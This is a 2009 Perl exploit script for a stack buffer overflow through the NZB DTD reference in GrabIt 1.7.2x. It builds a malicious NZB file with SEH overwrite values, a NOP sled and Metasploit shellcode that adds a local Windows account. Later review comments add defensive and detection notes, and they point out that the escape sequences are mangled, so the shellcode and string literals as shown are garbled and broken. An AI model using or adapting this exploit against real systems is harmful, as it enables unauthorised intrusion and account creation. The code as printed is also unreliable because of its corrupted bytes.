
# Title : GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit
# Published : 2009-05-07
# Author : Jeremy Brown


#!/usr/bin/perl
# theroadoutsidemyhouseispavedwithgoodintentions.pl
# AKA
# GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit
# BY
# Jeremy Brown [0xjbrown41@gmail.com] 05.07.2009
# ***********************************************************************************************************
# It seems I couldn't gather my resources quickly enough before the first exploit came out.. and it came as
# no surprise that it was a disappointment like so many others out there. I personally used to use this
# newsgroup program all the time, usenet is a nice service :) GrabIt is great-- Kudos to Shemes for sure.
# ***********************************************************************************************************
# After reading the advisory then debugging, I found the bug is a fairly standard hit and run stack overflow..
# we can overwrite SEH like a dream, so sadly this one may turn into malware rather quickly.. uh oh. Advice
# at the moment shall be.. update GrabIt quickly, like right now!
# ***********************************************************************************************************
#                libeay32.dll
#
# 1001A384   5B               POP EBX
# 1001A385   5D               POP EBP
# 1001A386   C3               RETN
#
# This exploit has been successfully tested in the following environments...
#
# Windows XP Home SP3 -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
#                        GrabIt 1.7.2b  (GrabIt172b.exe)
#
# Windows XP Pro SP3  -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
#                        GrabIt 1.7.2b  (GrabIt172b.exe)
#
# ***********************************************************************************************************
# BRONBRONGOTMVP: The Houston and LA series is heating up! I got the Lakers in 6 :D
# ***********************************************************************************************************
# theroadoutsidemyhouseispavedwithgoodintentions.pl

# NOTE(review): the escape sequences in this listing were mangled when it was
# reproduced (e.g. "x31xc9", "n", and unescaped inner quotes in the XML literals),
# so the string literals below are not the original bytes.  Do not derive byte
# signatures or hashes from this text; treat it as a description of the file
# layout only.
#
# Two hard-coded 32-bit values that end up in the SEH record on the stack.
# Defender's view: the technique relies on libeay32.dll loading at a fixed base
# (no rebasing/ASLR) and on the exception handler being usable from that
# module; SEH protections (SafeSEH/SEHOP) and module randomisation would be
# expected to break this.
$nextsehh = 0x909006EB; # jmp 6
$sehh     = 0x1001A384; # pop, pop, ret @ libeay32.dll

# win32_adduser -  PASS=face EXITFUNC=process USER=smiley Size=236 Encoder=PexFnstenvSub http://metasploit.com
# Metasploit-generated payload (parameters on the generator line above): on
# success it creates a local Windows account "smiley" with password "face".
# That unexpected local-account creation is the concrete post-exploitation
# indicator to alert on.
$sc = "x31xc9x83xe9xcbxd9xeexd9x74x24xf4x5bx81x73x13xe8".
      "x5bxc1xe6x83xebxfcxe2xf4x14xb3x85xe6xe8x5bx4axa3".
      "xd4xd0xbdxe3x90x5ax2ex6dxa7x43x4axb9xc8x5ax2axaf".
      "x63x6fx4axe7x06x6ax01x7fx44xdfx01x92xefx9ax0bxeb".
      "xe9x99x2ax12xd3x0fxe5xe2x9dxbex4axb9xccx5ax2ax80".
      "x63x57x8ax6dxb7x47xc0x0dx63x47x4axe7x03xd2x9dxc2".
      "xecx98xf0x26x8cxd0x81xd6x6dx9bxb9xeax63x1bxcdx6d".
      "x98x47x6cx6dx80x53x2axefx63xdbx71xe6xe8x5bx4ax8e".
      "xd4x04xf0x10x88x0dx48x1ex6bx9bxbaxb6x80x25x19x04".
      "x9bx33x59x18x62x55x96x19x0fx38xacx82xc6x3exb9x83".
      "xc8x74xa2xc6x86x3exb5xc6x9dx28xa4x94xc8x28xacx8f".
      "x84x3exb8xc6x8ex3axa2x83xc8x74x80xa2xacx7bxe7xc0".
      "xc8x35xa4x92xc8x37xaex85x89x37xa6x94x87x2exb1xc6".
      "xa9x3fxacx8fx86x32xb2x92x9ax3axb5x89x9ax28xe1x95".
      "x85x32xadx83x91x7bxeexa7xacx1fxc1xe6";

# Command-line arguments: output path and a target selector ("1" or "2").
# Neither is validated beyond the defined() check below; $filename is passed
# straight to open() (3-arg form, so no mode injection through the name).
$filename = $ARGV[0];
$target   = $ARGV[1];

     print "n            GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit";
     print "n                     Jeremy Brown [0xjbrown41@gmail.com]n";

# Usage message when either argument is missing.  Note the script runs without
# strict/warnings, so typos in globals would go unreported.
if((!defined($filename) || !defined($target)))
{

     print "nUsage: $0 pwn.nzb <target>n";
     print "nTargets: [1] Windows XP Homen         [2] Windows XP Pronn";
     exit;

}

# pack('l') emits a native-endian signed 32-bit value; little-endian is what
# the x86 Windows targets in the header expect.  The "jmp 6" value overwrites
# the next-SEH pointer, the libeay32.dll address overwrites the handler.
$nextseh = pack('l', $nextsehh);
$seh     = pack('l', $sehh);
$nop     = "x90";

# File prologue: XML declaration followed by a DOCTYPE whose PUBLIC identifier
# is left open so the overflow data can be appended as the system identifier.
$nzb1 = "<?xml version="1.0" encoding="utf-8" ?>n";
$nzb2 = "<!DOCTYPE nzb PUBLIC "YOUKNOWTHEWORDS,SOSINGALONGFORMEBABY" "";

# Lets get nice and comfortable
# Layout of the malicious file: prologue, 248 or 251 padding bytes (the only
# per-target difference), next-SEH jump, handler address, a 32-byte NOP sled,
# the shellcode, then the closing quote/bracket of the DOCTYPE.
# Detection angle: a DOCTYPE identifier several hundred bytes long consisting
# mostly of NOP bytes and binary data is an easily flagged anomaly in an NZB.
# The comparison is numeric (==) against a string; if $target matches neither
# branch, $payload stays undefined and an empty file is written below.
if($target == "1") { $payload = $nzb1 . $nzb2 . $nop x 248 . $nextseh . $seh . $nop x 32 . $sc . "">"; }
if($target == "2") { $payload = $nzb1 . $nzb2 . $nop x 251 . $nextseh . $seh . $nop x 32 . $sc . "">"; }

# Write the file.  Bareword handle FILE; close() is not checked, so a
# buffered write error at close would go unnoticed.
     open(FILE, ">", $filename) or die("nError: Can't write to $filename! Exploit stopped");
     print FILE $payload;
     close(FILE);

     print "nExploit NZB "$filename" successfully created.nn";
     exit;
